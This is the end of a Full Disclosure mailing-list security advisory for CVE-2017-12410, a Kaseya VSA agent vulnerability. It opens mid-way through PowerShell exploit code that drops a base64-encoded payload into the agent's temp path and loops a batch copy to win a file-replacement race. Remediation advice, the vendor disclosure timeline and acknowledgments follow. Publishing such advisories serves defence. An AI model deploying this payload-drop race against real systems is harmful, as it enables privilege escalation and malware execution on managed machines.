\$path = Get-ItemPropertyValue "hklm:\SOFTWARE\Kaseya\Agent\\$uid" `
-Name TempPath
[io.file]::WriteAllBytes(
"\$path\kaseya.exe",
[System.Convert]::FromBase64String(\$exe)
)
"powershell.exe %s" > "\$path\kaseya.ps1"
Remove-Item "\$path\kaseya.bat"
Add-Content "\$path\kaseya.bat" "cd \$path"
Add-Content "\$path\kaseya.bat" ":l"
Add-Content "\$path\kaseya.bat" "copy kaseya.exe \$exec_opt"
Add-Content "\$path\kaseya.bat" "goto l"
} else {
if (\$exec_opt.compareTo("default") -eq 0) {
\$exec_opt = "kawmi.dll"
}
\$path = "C:\\temp"
[io.file]::WriteAllBytes(
"\$path\kaseya.dll",
[System.Convert]::FromBase64String(\$dll)
)
Remove-Item "\$path\kaseya.bat"
Add-Content "\$path\kaseya.bat" "cd \$path"
Add-Content "\$path\kaseya.bat" ":l"
Add-Content "\$path\kaseya.bat" "copy kaseya.dll \$exec_opt"
Add-Content "\$path\kaseya.bat" "goto l"
}
# TODO: add check if we already won a race and kill the loop
Start-Process "\$path\kaseya.bat"
#while(1) {
# try {
# # FIXME: test Copy-Item to make it opsec safe
# #Copy-Item "\$path\kaseya.exe" "\$path\NetUserStateAudit.exe" `
# #-ErrorAction SilentlyContinue
# Copy-Item "\$path\kaseya.exe" "\$path\NetUserStateAudit.exe"
# } catch [System.Exception] {
# continue
# }
#}
''' % (path, execName, encLauncher)
return script
EOF
--
Remediation:
- Restrict permissions for users who can modify directories and files used
by the Kaseya VSA.
- Contact vendor for details.
Timeline:
03.08.2017: Initial contact email sent to security@kaseya.com with
information about the vulnerability.
03.08.2017: Notification sent to vendor that CVE-2017-12410 has been
assigned for this vulnerability by MITRE.
05.08.2017: Vendor confirms receiving the information about the
vulnerability and informs that the development team is looking
into the issue.
19.11.2017: No vendor response. Request for a status update.
10.02.2018: No vendor response. Notifying vendor about the planned advisory
release.
11.02.2018: Vendor replies with information that the fix is ready, they are
in the process of backporting it across a three versions of
their code, testing it, releasing patches and rolling it out
across their sass (sic!) versions. Vendor requests to postpone
publication of the advisory for 30 days to ensure that patches
are tested and ready for release.
12.02.2018: Confirmation sent that the publication of the advisory will be
postponed.
12.02.2018: Vendor acknowledges and commits to provide a weekly updates as
they progress to release.
20.03.2018: No vendor response. Advisory published.
23.03.2018: The advisory is released.
References:
[1] https://www.kaseya.com/products/vsa
Acknowledgments:
- Mike Puglia (Kaseya)
- Niket Khosla (Telstra)
- Telstra BTS Security Services (redteamnsw@team.telstra.com)
Thanks,
Filip Palian
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic